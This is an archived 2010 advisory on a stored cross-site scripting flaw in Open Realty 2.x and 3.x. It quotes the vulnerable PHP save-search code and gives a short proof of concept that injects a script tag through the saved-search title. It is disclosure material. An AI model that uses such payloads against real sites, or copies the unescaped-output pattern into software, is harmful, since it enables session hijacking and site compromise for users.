Open Realty 2.x / 3.x Cross Site Scripting

Open Realty 2.x / 3.x Cross Site Scripting: Posted Jul 26, 2010; Authored by K053; Open Realty versions 2.x and 3.x suffer from a cross site scripting vulnerability.; tags | exploit, xss; SHA-256 | 4edffd92873f6d0432b445dc3aee21e798f34b7ee06ac97855d237da9d1a53ac; Download | Favorite | View

Open Realty 2.x / 3.x Cross Site Scripting

# Title: persistence XSS flaw in Open Realty 2.x and 3.x
# Author: K053  <K053.dev0te3 at gmail>
# Date: 2010-7-24
# Hompage: http://open-realty.org
# Download Link: http://www.open-realty.org/download.html
# Version: 3.x & 2.x < seems all version >
======================================================================================================
Detail :
========
 
    function save_search(){
       ...
       ...
        
       // $title contain user supplied serach result name which save in DB without any input validation
        
       if ($num_columns == 0) {
            $sql = "INSERT INTO " . $config['table_prefix'] . "usersavedsearches
            (userdb_id, usersavedsearches_title, usersavedsearches_query_string,
            usersavedsearches_last_viewed,usersavedsearches_new_listings,usersavedsearches_notify)
            VALUES ($userID, $title, $query,now(),0, $notify)";
       ...
       ...
    }
    function view_saved_searches()
    {
       ... 
       ...
       else {  
                    while (!$recordSet->EOF) {
                    $title = $misc->make_db_unsafe($recordSet->fields['usersavedsearches_title']);
                    if ($title == '') {
                        $title = $lang['saved_search'];
                    }
                    $display .= '<a href="index.php?action=searchresults&' . $misc->make_db_unsafe
                    ($recordSet->fields['usersavedsearches_query_string']) . '">' . $title . '</a> 
                       <div class="note"><a href="index.php?action=delete_search&
                    searchID=' . $misc->make_db_unsafe($recordSet->fields['usersavedsearches_id']) . '"
                    onclick="return confirmDelete()">' . $lang['delete_search'] . '</a></div><br /><br />';
 
                    $recordSet->MoveNext();
                }
            }
        }else {
            $display = $status;
        }
         
        // and no output validation, $display passed immediately
         
        return $display;
======================================================================================================
POC :
=====
load http://address/index.php?action=save_search   < note some parameter set by passed url >
in textbox enter <script>alert(0)</scritp>.
 
load http://address/index.php?action=view_saved_searches  to view result
______________________________________________________________________________________________________
lackout Frenzy [http://b0f.ir]

Top Authors In Last 30 Days

Red Hat 237 files
indoushka 157 files
Jay Turla 150 files
Ubuntu 68 files
h00die 54 files
juan vazquez 43 files
sinn3r 41 files
H D Moore 31 files
Karn Ganeshen 23 files
Pedro Ribeiro 22 files

File Archives

Systems

AIX (430)
Apple (2,104)
BSD (378)
CentOS (61)
Cisco (1,954)
Debian (7,119)
Fedora (1,693)
FreeBSD (1,247)
Gentoo (4,567)
HPUX (881)
iOS (387)
iPhone (108)
IRIX (220)
Juniper (71)
Linux (51,136)
Mac OS X (696)
Mandriva (3,105)
NetBSD (256)
OpenBSD (489)
RedHat (16,775)
Slackware (941)
Solaris (1,615)
SUSE (1,444)
Ubuntu (9,828)
UNIX (9,454)
UnixWare (188)
Windows (6,766)
Other

Open Realty 2.x / 3.x Cross Site Scripting

Open Realty 2.x / 3.x Cross Site Scripting

File Archive:

September 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

Open Realty 2.x / 3.x Cross Site Scripting

Share This

Open Realty 2.x / 3.x Cross Site Scripting

File Archive:

September 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems